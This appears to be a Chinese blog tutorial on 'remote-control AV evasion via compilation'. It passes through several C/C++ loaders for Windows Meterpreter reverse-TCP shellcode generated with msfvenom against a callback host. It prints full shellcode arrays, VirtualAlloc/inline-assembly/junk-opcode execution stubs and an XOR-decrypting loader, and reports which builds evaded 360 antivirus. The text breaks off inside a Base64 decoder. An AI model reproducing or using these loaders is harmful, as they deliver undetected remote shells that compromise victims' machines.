远控免杀——编译篇

前言

上一篇是利用各种工具进行免杀，其中很多工具涉及到对shellcode进行混淆编码的操作处理，接着用python、ruby、C/C++等语言进行编译加载

C/C++

方法

1. 使用加载器加载C/C++代码
2. C/C++源码 + Shellcode直接编译生成，执行Shellcode的方式有：指针执行、汇编指令执行、申请动态内存等

指针执行

msfvenom生成C语言shellcode

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.221.128 lport=4444 -f c -o shell.c

用vs自行编译

unsigned char buf[] =
"\xd9\xc2\xd9\x74\x24\xf4\xb8\x8f\xd6\xe6\xb7\x5b\x33\xc9\xb1"
"\x7b\x31\x43\x18\x03\x43\x18\x83\xeb\x73\x34\x13\x6e\x40\x60"
"\xa8\xb5\xa2\x2c\x5a\x5d\x63\x10\x05\x92\xba\x27\xc1\xe5\x44"
"\x51\xa9\xee\x48\x62\xd5\xfb\x59\x7b\xd1\x87\xcb\x79\xd5\x71"
"\xbd\xa6\x40\xa4\x13\x2b\xe2\x48\xb8\x75\xbb\x03\xef\xab\x73"
"\xb9\x69\xf2\x18\x45\xf5\x82\x87\x2d\xc3\xaa\x59\xb4\x3c\xc0"
"\xa6\x9a\xe6\x20\x17\x8c\xc0\x87\xc8\x6a\xcb\xb3\xb2\x1f\x60"
"\x0b\x8a\x8c\x5f\xba\x08\xac\x2a\x1c\x2d\x9e\x1e\x0d\x29\xf2"
"\xf1\x83\xdb\xf4\xf8\xdb\xd9\x56\x9c\x51\x2d\x70\xe7\xa6\x9a"
"\x4a\x5e\xd5\x05\x16\x25\x2a\x80\xf3\xd7\xe1\xc6\xae\xef\xe6"
"\xb5\x7e\x0e\x1a\x89\x9d\x47\x33\x6a\xc4\x4d\x53\x72\x12\x8e"
"\xc9\x1c\xe1\x9e\xee\xeb\x0b\x7a\x5d\x1b\xa7\x79\x4e\xbb\xcf"
"\xbe\xee\x9b\x92\x71\x37\x90\x10\xf9\x3e\x47\x7b\x85\xc1\x69"
"\x08\xd0\xbd\x3e\x39\xab\x3c\x46\xa8\x1a\x0e\xa8\xa8\x5a\xfe"
"\x2a\x44\x35\x2d\x26\x83\x4c\xbb\x7f\x30\xe9\xee\xc5\x46\x7f"
"\xa9\x32\x31\x92\x3c\xfc\x36\x12\xde\x35\xff\xad\xa9\x53\x52"
"\x61\xfe\xdf\x86\xb9\xb8\xc0\xc3\xa2\x11\x61\xcd\xd9\x3e\x83"
"\xae\x0c\x8b\x30\x3e\x9f\xb8\x6a\x9e\xc6\x5f\x44\xa6\x63\x6b"
"\x01\x38\x5c\x5e\x77\xcd\x5a\xa3\xe9\x7e\x60\xbc\x15\xc8\x87"
"\x50\x76\x71\x76\xc9\xd4\x2d\xfe\xa2\x91\x3f\x97\x5b\xd2\xba"
"\x4f\x97\xdf\xf0\x2c\xa9\xfd\x6f\x17\x11\x94\x8e\xb9\xca\xce"
"\x7d\xf4\xe3\xc2\xd7\x72\x67\x23\x55\x2e\xdc\x47\x97\xae\xa2"
"\xc6\x17\x59\xc2\xa2\xfa\x95\xb4\x4e\xb0\x23\x37\x56\x71\xc4"
"\x7a\xcb\xfb\xfe\xa2\xe4\x32\xa1\x30\x2a\x44\x34\x4d\x67\x9e"
"\x91\xcf\x03\x59\x67\x33\xf7\xae\x80\x76\x49\x73\x36\xdf\x16"
"\x69\x99\x80\x24\x0d\x17\xaf\x92\x2b\x41\x86\xf8\x45\xdb\x54"
"\x7f\x74\x2c\x5b\xc0\x2f\x33\x26\x0e\xa9\xfc\xe4\xcf\x5b\x67"
"\xf6\x06\x43\x14\x15\x71\xf6\xaf\x3c\x51\x57\x13\x57\x04\x58"
"\x2d\xd7\x6f\x6e\xb5\x16\x07\x30\x99\xf9\x64\x0b\x5c\x10\x0c"
"\x90\x72\x44\x08\xc3\x59\x91\x25\xb8\xda\x49\x93\x0b\xea\xcd"
"\x2d\xb6\xb0\xdb\xaf\xa0\x9b\x0e\x8f\x78\x44\x04\xb2\x25\x80"
"\x44\xa0\xb4\x9a\x23\xce\x05\x3d\xbb\xe8\xc0\x36\xf3\x48\xcf"
"\xa7\xe8\xfe\x74\x4a\x25\xa7\x18\x0f\x37\xdb\x25\x3f\xa2\x09"
"\x16\x1e\x06\xb9\xc1\x58\xd6\xcf\xf4\x7b\x26\x84\x21\x54\x54"
"\x46\x6f\x80\x09\xda\xe1";
#pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
//windows控制台程序不出黑窗口
main()

{
	((void(*)(void)) & buf)();
}

编译生成exe

还没运行文件过了两分钟就被查杀了

申请动态内存

申请动态内存并加载shellcode，shellcode代码同上

#include <Windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
//windows控制台程序不出黑窗口
unsigned char buf[] = 
"\xd9\xc2\xd9\x74\x24\xf4\xb8\x8f\xd6\xe6\xb7\x5b\x33\xc9\xb1"
"\x7b\x31\x43\x18\x03\x43\x18\x83\xeb\x73\x34\x13\x6e\x40\x60"
"\xa8\xb5\xa2\x2c\x5a\x5d\x63\x10\x05\x92\xba\x27\xc1\xe5\x44"
"\x51\xa9\xee\x48\x62\xd5\xfb\x59\x7b\xd1\x87\xcb\x79\xd5\x71"
"\xbd\xa6\x40\xa4\x13\x2b\xe2\x48\xb8\x75\xbb\x03\xef\xab\x73"
"\xb9\x69\xf2\x18\x45\xf5\x82\x87\x2d\xc3\xaa\x59\xb4\x3c\xc0"
"\xa6\x9a\xe6\x20\x17\x8c\xc0\x87\xc8\x6a\xcb\xb3\xb2\x1f\x60"
"\x0b\x8a\x8c\x5f\xba\x08\xac\x2a\x1c\x2d\x9e\x1e\x0d\x29\xf2"
"\xf1\x83\xdb\xf4\xf8\xdb\xd9\x56\x9c\x51\x2d\x70\xe7\xa6\x9a"
"\x4a\x5e\xd5\x05\x16\x25\x2a\x80\xf3\xd7\xe1\xc6\xae\xef\xe6"
"\xb5\x7e\x0e\x1a\x89\x9d\x47\x33\x6a\xc4\x4d\x53\x72\x12\x8e"
"\xc9\x1c\xe1\x9e\xee\xeb\x0b\x7a\x5d\x1b\xa7\x79\x4e\xbb\xcf"
"\xbe\xee\x9b\x92\x71\x37\x90\x10\xf9\x3e\x47\x7b\x85\xc1\x69"
"\x08\xd0\xbd\x3e\x39\xab\x3c\x46\xa8\x1a\x0e\xa8\xa8\x5a\xfe"
"\x2a\x44\x35\x2d\x26\x83\x4c\xbb\x7f\x30\xe9\xee\xc5\x46\x7f"
"\xa9\x32\x31\x92\x3c\xfc\x36\x12\xde\x35\xff\xad\xa9\x53\x52"
"\x61\xfe\xdf\x86\xb9\xb8\xc0\xc3\xa2\x11\x61\xcd\xd9\x3e\x83"
"\xae\x0c\x8b\x30\x3e\x9f\xb8\x6a\x9e\xc6\x5f\x44\xa6\x63\x6b"
"\x01\x38\x5c\x5e\x77\xcd\x5a\xa3\xe9\x7e\x60\xbc\x15\xc8\x87"
"\x50\x76\x71\x76\xc9\xd4\x2d\xfe\xa2\x91\x3f\x97\x5b\xd2\xba"
"\x4f\x97\xdf\xf0\x2c\xa9\xfd\x6f\x17\x11\x94\x8e\xb9\xca\xce"
"\x7d\xf4\xe3\xc2\xd7\x72\x67\x23\x55\x2e\xdc\x47\x97\xae\xa2"
"\xc6\x17\x59\xc2\xa2\xfa\x95\xb4\x4e\xb0\x23\x37\x56\x71\xc4"
"\x7a\xcb\xfb\xfe\xa2\xe4\x32\xa1\x30\x2a\x44\x34\x4d\x67\x9e"
"\x91\xcf\x03\x59\x67\x33\xf7\xae\x80\x76\x49\x73\x36\xdf\x16"
"\x69\x99\x80\x24\x0d\x17\xaf\x92\x2b\x41\x86\xf8\x45\xdb\x54"
"\x7f\x74\x2c\x5b\xc0\x2f\x33\x26\x0e\xa9\xfc\xe4\xcf\x5b\x67"
"\xf6\x06\x43\x14\x15\x71\xf6\xaf\x3c\x51\x57\x13\x57\x04\x58"
"\x2d\xd7\x6f\x6e\xb5\x16\x07\x30\x99\xf9\x64\x0b\x5c\x10\x0c"
"\x90\x72\x44\x08\xc3\x59\x91\x25\xb8\xda\x49\x93\x0b\xea\xcd"
"\x2d\xb6\xb0\xdb\xaf\xa0\x9b\x0e\x8f\x78\x44\x04\xb2\x25\x80"
"\x44\xa0\xb4\x9a\x23\xce\x05\x3d\xbb\xe8\xc0\x36\xf3\x48\xcf"
"\xa7\xe8\xfe\x74\x4a\x25\xa7\x18\x0f\x37\xdb\x25\x3f\xa2\x09"
"\x16\x1e\x06\xb9\xc1\x58\xd6\xcf\xf4\x7b\x26\x84\x21\x54\x54"
"\x46\x6f\x80\x09\xda\xe1";
main()
{
char *Memory; 
 Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
memcpy(Memory, buf, sizeof(buf));
 ((void(*)())Memory)();
}

编译生成exe

结果和上面一样，刚传进去扫描没报毒，过一会就被查杀了

嵌入汇编加载

#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] =
"\xbf\xf3\x8d\xa9\x93\xdb\xdc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x7b\x83\xea\xfc\x31\x7a\x0f\x03\x7a\xfc\x6f\x5c\x49\xdc\xa9"
"\xeb\x4a\x14\xf3\xbe\x37\xda\x1c\xe7\x06\x2b\xad\x63\xea\x6b"
"\xca\xba\xbc\x7e\xd0\xec\x29\xc8\x87\xbc\x57\x56\x43\x43\xbb"
"\x38\xcd\xce\x6f\x6e\xe0\x75\x8a\x8d\x44\xed\xe1\x47\xf8\xa2"
"\x90\xfc\x52\x14\x37\x71\x51\x05\x4e\x90\x97\x8b\xaf\xd9\x2a"
"\x99\x5d\xa1\x39\x15\x30\x73\xe6\x82\x51\x9c\x80\x32\xbe\xed"
"\x56\x51\xbd\xf0\xa7\x99\x93\xd8\x7a\x89\x69\xde\x5c\xc9\x75"
"\xc6\x95\xd3\x71\x15\xb9\xcf\x88\xaf\x3f\x0b\x5a\x3d\x03\x11"
"\xd6\xdf\x2c\x80\x7d\x5b\x26\x0d\x76\x6d\x4e\xe7\xa7\xe2\x89"
"\x41\xf2\x25\x60\x1c\x66\x0d\x71\x99\xff\x73\x11\xbe\x6b\x23"
"\xed\x4b\x58\xaf\xa4\x88\x07\xbf\x32\x60\x82\xf3\x0f\x05\xb2"
"\x42\x28\x3b\x1f\x2a\xd4\x15\x7c\xa8\x06\xcf\xb1\x31\x0b\xf6"
"\x85\x26\xd6\x2b\x23\x44\xad\x50\x75\xad\x1c\xe9\x88\x5c\x32"
"\x88\xc4\x83\x22\x2e\x18\x92\x93\x33\x8d\x2e\xba\xbf\xa8\x04"
"\xbb\x51\x01\x45\x9b\x97\xdc\x15\xb0\xbb\x7c\x08\x27\x7a\x1f"
"\x19\x4f\x3c\x2a\x04\x1e\xe4\xe6\x3e\x49\x33\xd7\x18\x95\x93"
"\x17\x6b\x9f\xd6\x31\x20\x1b\x7a\x77\x7b\x53\xbf\x98\x9c\x9c"
"\xe7\x7c\x9c\xaa\x09\x38\xdd\x97\x40\x0a\x5e\x5f\x45\xcc\xf8"
"\xc8\xd4\x35\x21\x7a\x6b\xa0\x57\x2b\xb6\xd5\x14\x3c\xbd\xb1"
"\xa0\x2f\x48\x12\xa4\x79\x3f\xf9\x4e\x47\xc2\x85\x61\x97\x15"
"\x37\x21\x3c\xb9\x11\x27\x6a\x4f\x80\xc5\x94\x41\xde\x05\x93"
"\xa4\xce\xc6\xd9\xf0\x0c\x61\xdf\x98\x98\xd4\x88\x8a\xe5\x2c"
"\xcb\x99\x6f\x91\x37\xd8\xc9\x98\x82\xca\x95\x27\xa8\xff\x62"
"\x8e\xb8\xfa\x73\xa0\xd8\xb5\x6e\x40\x0c\x4a\xdd\x5f\x74\x7b"
"\x6a\x57\x04\xce\x47\x4e\x3c\x7d\xea\x0a\xd7\x41\x05\x22\xf0"
"\xa8\x24\xed\x65\xc7\xa1\xc4\xca\xea\x1f\x0c\xaf\x71\x63\x4c"
"\x92\x8f\xc9\x44\x87\xb5\x69\x9c\x4b\xb1\x2b\x24\x7b\xe0\xe4"
"\x06\x88\xaf\x3d\xb0\x8d\xca\x4f\xda\xba\xac\x86\x58\xf9\x41"
"\x01\xc7\x4f\x45\x78\x0b\x3c\xb6\xe7\x4f\x0b\x98\x88\x0b\x66"
"\xdf\xc8\x8b\xf8\x1b\x28\x28\x3e\x47\xa1\xf1\x10\xe3\x15\x2a"
"\x65\xeb\x95\xb1\x5a\x99\x44\x13\xac\xc2\x1b\x5d\x8a\xbf\x97"
"\x0a\xc3\xc9\x11\xdd\x40\x54\x16\x18\xf5\x95\x9d\x40\xd2\x9b"
"\x71\xfe\xa2\x40\x31\xd5\x31\x99\xc9\xcd\xe1\xd2\x73\x59\xf6"
"\xbe\x89\x55\xf4\x30\x8a";
void main()
{
 __asm
 {
 
 mov eax, offset shellcode
 jmp eax
 }
}

shellcode重新生成了一次，编译生成exe

msf正常上线

360静态动态均没有查杀

PS：win7中运行如果出现 vcruntime140D.dll丢失 报错，可以修改运行库为多线程(/MT)，默认是MTD

强制类型转换

#include <windows.h>
#include <stdio.h>

unsigned char buf[] =
"\xbf\xf3\x8d\xa9\x93\xdb\xdc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x7b\x83\xea\xfc\x31\x7a\x0f\x03\x7a\xfc\x6f\x5c\x49\xdc\xa9"
"\xeb\x4a\x14\xf3\xbe\x37\xda\x1c\xe7\x06\x2b\xad\x63\xea\x6b"
"\xca\xba\xbc\x7e\xd0\xec\x29\xc8\x87\xbc\x57\x56\x43\x43\xbb"
"\x38\xcd\xce\x6f\x6e\xe0\x75\x8a\x8d\x44\xed\xe1\x47\xf8\xa2"
"\x90\xfc\x52\x14\x37\x71\x51\x05\x4e\x90\x97\x8b\xaf\xd9\x2a"
"\x99\x5d\xa1\x39\x15\x30\x73\xe6\x82\x51\x9c\x80\x32\xbe\xed"
"\x56\x51\xbd\xf0\xa7\x99\x93\xd8\x7a\x89\x69\xde\x5c\xc9\x75"
"\xc6\x95\xd3\x71\x15\xb9\xcf\x88\xaf\x3f\x0b\x5a\x3d\x03\x11"
"\xd6\xdf\x2c\x80\x7d\x5b\x26\x0d\x76\x6d\x4e\xe7\xa7\xe2\x89"
"\x41\xf2\x25\x60\x1c\x66\x0d\x71\x99\xff\x73\x11\xbe\x6b\x23"
"\xed\x4b\x58\xaf\xa4\x88\x07\xbf\x32\x60\x82\xf3\x0f\x05\xb2"
"\x42\x28\x3b\x1f\x2a\xd4\x15\x7c\xa8\x06\xcf\xb1\x31\x0b\xf6"
"\x85\x26\xd6\x2b\x23\x44\xad\x50\x75\xad\x1c\xe9\x88\x5c\x32"
"\x88\xc4\x83\x22\x2e\x18\x92\x93\x33\x8d\x2e\xba\xbf\xa8\x04"
"\xbb\x51\x01\x45\x9b\x97\xdc\x15\xb0\xbb\x7c\x08\x27\x7a\x1f"
"\x19\x4f\x3c\x2a\x04\x1e\xe4\xe6\x3e\x49\x33\xd7\x18\x95\x93"
"\x17\x6b\x9f\xd6\x31\x20\x1b\x7a\x77\x7b\x53\xbf\x98\x9c\x9c"
"\xe7\x7c\x9c\xaa\x09\x38\xdd\x97\x40\x0a\x5e\x5f\x45\xcc\xf8"
"\xc8\xd4\x35\x21\x7a\x6b\xa0\x57\x2b\xb6\xd5\x14\x3c\xbd\xb1"
"\xa0\x2f\x48\x12\xa4\x79\x3f\xf9\x4e\x47\xc2\x85\x61\x97\x15"
"\x37\x21\x3c\xb9\x11\x27\x6a\x4f\x80\xc5\x94\x41\xde\x05\x93"
"\xa4\xce\xc6\xd9\xf0\x0c\x61\xdf\x98\x98\xd4\x88\x8a\xe5\x2c"
"\xcb\x99\x6f\x91\x37\xd8\xc9\x98\x82\xca\x95\x27\xa8\xff\x62"
"\x8e\xb8\xfa\x73\xa0\xd8\xb5\x6e\x40\x0c\x4a\xdd\x5f\x74\x7b"
"\x6a\x57\x04\xce\x47\x4e\x3c\x7d\xea\x0a\xd7\x41\x05\x22\xf0"
"\xa8\x24\xed\x65\xc7\xa1\xc4\xca\xea\x1f\x0c\xaf\x71\x63\x4c"
"\x92\x8f\xc9\x44\x87\xb5\x69\x9c\x4b\xb1\x2b\x24\x7b\xe0\xe4"
"\x06\x88\xaf\x3d\xb0\x8d\xca\x4f\xda\xba\xac\x86\x58\xf9\x41"
"\x01\xc7\x4f\x45\x78\x0b\x3c\xb6\xe7\x4f\x0b\x98\x88\x0b\x66"
"\xdf\xc8\x8b\xf8\x1b\x28\x28\x3e\x47\xa1\xf1\x10\xe3\x15\x2a"
"\x65\xeb\x95\xb1\x5a\x99\x44\x13\xac\xc2\x1b\x5d\x8a\xbf\x97"
"\x0a\xc3\xc9\x11\xdd\x40\x54\x16\x18\xf5\x95\x9d\x40\xd2\x9b"
"\x71\xfe\xa2\x40\x31\xd5\x31\x99\xc9\xcd\xe1\xd2\x73\x59\xf6"
"\xbe\x89\x55\xf4\x30\x8a";
pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
void main()
{
 ((void(WINAPI*)(void))&buf)();
}

编译生成exe

静态没问题，执行被查杀

汇编花指令

#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] =
"\xbf\xf3\x8d\xa9\x93\xdb\xdc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x7b\x83\xea\xfc\x31\x7a\x0f\x03\x7a\xfc\x6f\x5c\x49\xdc\xa9"
"\xeb\x4a\x14\xf3\xbe\x37\xda\x1c\xe7\x06\x2b\xad\x63\xea\x6b"
"\xca\xba\xbc\x7e\xd0\xec\x29\xc8\x87\xbc\x57\x56\x43\x43\xbb"
"\x38\xcd\xce\x6f\x6e\xe0\x75\x8a\x8d\x44\xed\xe1\x47\xf8\xa2"
"\x90\xfc\x52\x14\x37\x71\x51\x05\x4e\x90\x97\x8b\xaf\xd9\x2a"
"\x99\x5d\xa1\x39\x15\x30\x73\xe6\x82\x51\x9c\x80\x32\xbe\xed"
"\x56\x51\xbd\xf0\xa7\x99\x93\xd8\x7a\x89\x69\xde\x5c\xc9\x75"
"\xc6\x95\xd3\x71\x15\xb9\xcf\x88\xaf\x3f\x0b\x5a\x3d\x03\x11"
"\xd6\xdf\x2c\x80\x7d\x5b\x26\x0d\x76\x6d\x4e\xe7\xa7\xe2\x89"
"\x41\xf2\x25\x60\x1c\x66\x0d\x71\x99\xff\x73\x11\xbe\x6b\x23"
"\xed\x4b\x58\xaf\xa4\x88\x07\xbf\x32\x60\x82\xf3\x0f\x05\xb2"
"\x42\x28\x3b\x1f\x2a\xd4\x15\x7c\xa8\x06\xcf\xb1\x31\x0b\xf6"
"\x85\x26\xd6\x2b\x23\x44\xad\x50\x75\xad\x1c\xe9\x88\x5c\x32"
"\x88\xc4\x83\x22\x2e\x18\x92\x93\x33\x8d\x2e\xba\xbf\xa8\x04"
"\xbb\x51\x01\x45\x9b\x97\xdc\x15\xb0\xbb\x7c\x08\x27\x7a\x1f"
"\x19\x4f\x3c\x2a\x04\x1e\xe4\xe6\x3e\x49\x33\xd7\x18\x95\x93"
"\x17\x6b\x9f\xd6\x31\x20\x1b\x7a\x77\x7b\x53\xbf\x98\x9c\x9c"
"\xe7\x7c\x9c\xaa\x09\x38\xdd\x97\x40\x0a\x5e\x5f\x45\xcc\xf8"
"\xc8\xd4\x35\x21\x7a\x6b\xa0\x57\x2b\xb6\xd5\x14\x3c\xbd\xb1"
"\xa0\x2f\x48\x12\xa4\x79\x3f\xf9\x4e\x47\xc2\x85\x61\x97\x15"
"\x37\x21\x3c\xb9\x11\x27\x6a\x4f\x80\xc5\x94\x41\xde\x05\x93"
"\xa4\xce\xc6\xd9\xf0\x0c\x61\xdf\x98\x98\xd4\x88\x8a\xe5\x2c"
"\xcb\x99\x6f\x91\x37\xd8\xc9\x98\x82\xca\x95\x27\xa8\xff\x62"
"\x8e\xb8\xfa\x73\xa0\xd8\xb5\x6e\x40\x0c\x4a\xdd\x5f\x74\x7b"
"\x6a\x57\x04\xce\x47\x4e\x3c\x7d\xea\x0a\xd7\x41\x05\x22\xf0"
"\xa8\x24\xed\x65\xc7\xa1\xc4\xca\xea\x1f\x0c\xaf\x71\x63\x4c"
"\x92\x8f\xc9\x44\x87\xb5\x69\x9c\x4b\xb1\x2b\x24\x7b\xe0\xe4"
"\x06\x88\xaf\x3d\xb0\x8d\xca\x4f\xda\xba\xac\x86\x58\xf9\x41"
"\x01\xc7\x4f\x45\x78\x0b\x3c\xb6\xe7\x4f\x0b\x98\x88\x0b\x66"
"\xdf\xc8\x8b\xf8\x1b\x28\x28\x3e\x47\xa1\xf1\x10\xe3\x15\x2a"
"\x65\xeb\x95\xb1\x5a\x99\x44\x13\xac\xc2\x1b\x5d\x8a\xbf\x97"
"\x0a\xc3\xc9\x11\xdd\x40\x54\x16\x18\xf5\x95\x9d\x40\xd2\x9b"
"\x71\xfe\xa2\x40\x31\xd5\x31\x99\xc9\xcd\xe1\xd2\x73\x59\xf6"
"\xbe\x89\x55\xf4\x30\x8a";

void main()
{
 __asm
 {
 
 mov eax, offset shellcode
 _emit 0xFF 
 _emit 0xE0
 }
}

编译生成exe

msf正常上线

360动态静态查杀均没查杀

XOR加密

msfvenom生成raw格式shellcode

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.221.128 lport=4444 -f raw > shellcode.raw

用ShellcodeWrapper进行加密

python shellcode_encoder.py -cpp -cs -py shellcode.raw jasontt xor
//key：jasontt

生成C++、C#、python文件均可以用来攻击，css.exe执行C#等

C++代码如下

/*
Author: Arno0x0x, Twitter: @Arno0x0x
*/

#include "stdafx.h" //编译报错此处删掉
#include <windows.h>
#include <iostream>

int main(int argc, char **argv) {

	// Encrypted shellcode and cipher key obtained from shellcode_encoder.py
	char encryptedShellcode[] = "\xd5\xac\x20\x16\x16\xae\xbe\xb3\x15\x57\x9b\x34\x47\xbd\xdb\x1a\xf0\xad\x6a\x45\x0e\x65\x62\x09\xad\xdf\xf8\xd7\x68\x8d\x68\x1f\x20\x25\xa3\xdb\x7e\x69\xc7\xa1\x59\x41\x0f\x2d\x64\xd2\xd5\x59\xf6\xd7\xa4\xb7\xac\x28\x46\xe0\xc7\x34\xa6\xb5\x49\x3c\x3b\x16\x55\x76\x28\x11\x84\x15\x8c\x6e\xc1\x0e\x10\x08\x0b\x80\x60\x80\xdc\xe0\xcd\xe8\xa7\x18\x95\x12\xe2\xfa\xf2\xc1\x1f\x35\xb2\xaa\x3a\xe8\xd0\xad\x46\x2e\x0a\x09\xf6\xf4\x21\x10\x9b\xc8\x8a\x3e\x6e\xdd\x7e\x0a\x7f\x16\xc2\x9e\x0c\xe2\xa4\x77\xc5\x86\x90\x00\x8b\xb0\x42\x39\xa3\x7f\x37\x4f\x22\xc2\x1f\xba\x39\x31\xc1\xc4\xd2\x3b\xc0\x11\x91\xbe\xaa\x9b\x89\x45\xb2\x10\x3b\xca\x5b\x04\x3c\x2b\x4e\x13\x25\x29\xce\x88\x97\x0f\x64\x16\xfe\x62\x4c\x46\xd9\xe2\x81\x2a\x69\x33\x44\x8f\x48\x58\xac\x8c\x67\xe1\x94\x55\xbc\x14\x26\xa2\x77\xb8\x66\x5a\x9a\xbf\x10\xcc\x69\xa8\xe0\x6d\x53\xb1\x0f\xf7\xe9\x45\x24\x08\xf8\x0d\x88\x84\x86\x2f\xdc\x2b\xdf\x2d\x5e\xab\xac\xe9\x44\x11\x95\x4b\xdc\xff\x7d\xe1\x26\xa4\x6e\x58\x53\x5d\xb9\x15\xb5\xf5\xdd\x74\x8c\x01\xb3\x0b\x26\x43\xc4\xdf\x52\xbe\xbe\x78\xc2\xbc\xc0\x8c\xa5\x12\xb8\x47\x7c\x03\x60\x9d\xa0\x15\xad\xd7\x2a\xa6\xe2\x44\x4b\xb1\xd9\x13\x91\xc9\x65\x20\x27\x8e\x8a\xe3\x49\x5c\x06\x2c\xcc\x00\x63\x70\x9f\xa5\xab\xf1\x9c\x3d\xf1\xde\x5f\x85\xbb\x52\x67\xe7\x65\xaf\xd6\xec\xd0\xb4\x8d\x62\xcd\xe1\xc0\xc1\x60\xb1\x91\x1d\x82\x87\x64\xf6\xaf\x30\x54\x0a\xed\x8b\x06\x41\xdd\x54\x03\xf1\xc6\x2a\xb2\x57\xb8\xd7\x83\x4e\xd0\xab\xb3\x94\x00\x6d\xff\xe0\xc1\x52\x16\x7e\x66\x1a\xb0\xa8\x0b\x21\x0b\x03\x51\x14\x56\x30\x0c\xea\x89\x4b\x27\xbe\x30\xab\xc0\xe7\x8c\xba\x8c\xfd\x68\x77\x81\x4a\x99\x56\xa9\x07\xbe\x19\x9f\x21\xfd\xd3\xdb\xb2\xca\x36\xd3\x36\xaf\xcc\x4a\x18\xb4\xdc\x77\x01\xd7\x58\x55\xcf\xfa\xf4\x88\x82\xcc\xda\x88\x0b\x85\xe2\xcd\x46\x6a\x65\xe5\x7b\xe3\x38\x89\x1d\x40\xa3\x4e\x51\xd0\x8b\x96\x64\xfc\xfb\x68\x34\x1c\x80\x78\x68\x28\xc6\xc3\xc6\xa1\xa4\x62\xd4\xdb\x53\x26\xf2\x82\xd7\x40\xcb\xbd\x93\xfb\x79\xd0\x7a\xab\x99\x60\x02\xad\xe1\x18\xd4\x8c\x84\x68\xa2\xba\x34\x2c\x1b\xd3\x57\xe9\x9a\x79\x92\x87\xb5\x86\x2a\x0d\xc2\x17\x16\x83\x00";
	char key[] = "jasontt";
	char cipherType[] = "xor";

	// Char array to host the deciphered shellcode
	char shellcode[sizeof encryptedShellcode];	
	

	// XOR decoding stub using the key defined above must be the same as the encoding key
	int j = 0;
	for (int i = 0; i < sizeof encryptedShellcode; i++) {
		if (j == sizeof key - 1) j = 0;

		shellcode[i] = encryptedShellcode[i] ^ key[j];
		j++;
	}

	// Allocating memory with EXECUTE writes
	void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	// Copying deciphered shellcode into memory as a function
	memcpy(exec, shellcode, sizeof shellcode);

	// Call the shellcode
	((void(*)())exec)();
}

编译生成exe

msf正常上线

这里有个小插曲，中间去上课了，本来msf正常上线说明动静态查杀都过了，但是下课回来的时候发现已经被查杀了，出现这种情况说明之前的某些免杀效果可能也只是暂时的。

Kali中运行ShellcodeWrapper可能出现的问题，解决方法如下：

问题：No module named Crypto.Hash

解决方法：

pip uninstall pycrypto
pip install pycryptodome

Base64加密

msfvenom生成base64编码shellcode

msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.221.128 lport=4444 -f c > shell.c

base64.c

/* Base64 encoder/decoder. Originally Apache file ap_base64.c
*/
#include <string.h>
#include "base64.h"
/* aaaack but it's fast and const should make it shared text page. */
static const unsigned char pr2six[256] =
{
	/* ASCII table */
	64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
	64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
	64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
	52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
	64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
	15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
	64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
	41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
	64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
	64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
	64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
	64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
	64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
	64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
	64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
	64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
};
int Base64decode_len(const char* bufcoded)
{
	int nbytesdecoded;
	register const unsigned char* bufin;
	register int nprbytes;
	bufin = (const unsigned char*)bufcoded;
	while (pr2six[*(bufin++)] <= 63);
	nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
	nbytesdecoded = ((nprbytes + 3) / 4) * 3;
	return nbytesdecoded + 1;
}
int Base64decode(char* bufplain, const char* bufcoded)
{
	int nbytesdecoded;
	register const unsigned char* bufin;
	register unsigned char* bufout;
	register int nprbytes;
	bufin = (const unsigned char*)bufcoded;
	while (pr2six[*(bufin++)] <= 63);
	nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
	nbytesdecoded = ((nprbytes + 3) / 4) * 3;
	bufout = (unsigned char*)bufplain;
	bufin = (const unsigned char*)bufcoded;
	while (nprbytes > 4) {
		*(bufout++) =
			(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
		*(bufout++) =
			(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
		*(bufout++) =
			(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
